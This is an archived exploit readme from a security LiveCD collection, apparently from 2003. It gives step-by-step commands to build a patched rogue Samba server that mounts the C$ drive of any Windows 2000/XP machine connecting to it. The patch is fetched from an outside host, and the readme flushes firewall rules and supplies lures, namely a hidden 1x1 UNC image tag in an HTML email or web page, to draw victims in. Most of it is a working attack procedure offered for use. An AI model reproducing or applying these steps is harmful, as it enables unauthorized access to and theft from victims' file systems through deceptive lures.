home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / samba / sambaSWATBufferOverflow.txt < prev    next >
Text File  |  2005-02-12  |  3KB  |  80 lines

  1. ################################################################################
  2. # Exploit for "Authentication flaw in Windows SMB protocol"                    #
  3. ################################################################################
  4. # Release Date:                                                                #
  5. #   April 24, 2003                                                             #
  6. #                                                                              #
  7. # Code by Haamed Gheibi (haamed@linux.ce.aut.ac.ir)                            #
  8. #         Salman Niksefat (salman@linux.ce.aut.ac.ir)                          #
  9. #                                                                              #
  10. # Systems Affected by this exploit:                                            #
  11. #   Windows 2000 (SP0 SP1 SP2 SP3)                                             #
  12. #   Windows XP (SP0 SP1)                                                       #
  13. #                                                                              #
  14. # THIS EXPLOIT IS PROVIDED FOR EDUCATIONAL PURPOSES ONLY AS A PROOF OF CONCEPT #
  15. # WE TAKE NO RESPONSIBILITY FOR USE OF THIS CODE.                              #
  16. ################################################################################
  17.  
  18. This exploit is based on samba-2.2.8a, you can download the source code from:
  19.  http://us1.samba.org/samba/ftp/samba-2.2.8a.tar.bz2
  20. or other mirrors.
  21.  
  22. First you should configure and make samba source code as follow:
  23. You need first to extract the file:
  24.  $ tar -jxf samba-2.2.8a.tar.bz2
  25.  $ cd samba-2.2.8a/source
  26.  
  27. Here you need to configure with suitable options. Here is a config for RedHat 9:
  28.  $ ./configure --sysconfdir=/etc --with-codepagedir=/usr/share/samba/codepages\
  29.   --with-lockdir=/var/cache/samba --with-configdir=/etc/samba
  30.  
  31.  $ make
  32.  $ make bin/smbmount
  33.  $ su
  34.  # make install
  35.  
  36. First add an arbitary user to samba: (Choose a reliable password for it for your protection!)
  37.  # smbadduser smbtmpuser:root
  38.  
  39. Now check if your samba server(bin/smbd) and client(bin/smbmount) are working, 
  40. and that ipchains rulls are not set. you can use:
  41.  # service smbd stop
  42.  # bin/smbd -i
  43.  # ipchains -F
  44.  
  45. Well, now if everything works fine, you can apply the exploit code to the source.
  46. Download it from: http://seclab.ce.aut.ac.ir/samba-exp/exploit/backrush.patch
  47.  # patch < backrush.patch
  48.  
  49. Make it again:
  50.  # make bin/smbd
  51.  # make bin/smbmount
  52. [Note that you shouldn't make whole samba, cause you may get linker errors]
  53.  
  54. Make necessary directories:
  55.  # mkdir -p bin/backrush/log
  56.  # mkdir bin/backrush/mnt
  57.  # touch bin/backrush/ip2sharename.map
  58.  
  59. Now we are done, you MUST change directory to bin and run the server:
  60.  # cd bin
  61.  # killall -9 smbd
  62.  # ./smbd
  63.  
  64. Now by default, the C$ share folder of any Windows machine who tries to connect
  65. to this SMB server, would be mounted to mnt/machinename-random folder.
  66. If you want to mount another share folder, you can add an entry to ip2sharename.map file as follow:
  67. IPADDRESS:SHARENAME
  68. This option is suitable for XP systems.
  69.  
  70. 2 ways 2 force a client to automatically connect to your modified SMB server:
  71.   1. Send him/her a HTML email with the following tag:
  72.     <IMG src='\\smb-server\nofile.gif' width=1 height=1>
  73.  
  74.   2. Invite him/her to visit your personal web page.
  75.      You can make it by the above tag, then pray and wait until he/she visits your page. ;)
  76.  
  77. Enjoy!
  78.  
  79.  
  80.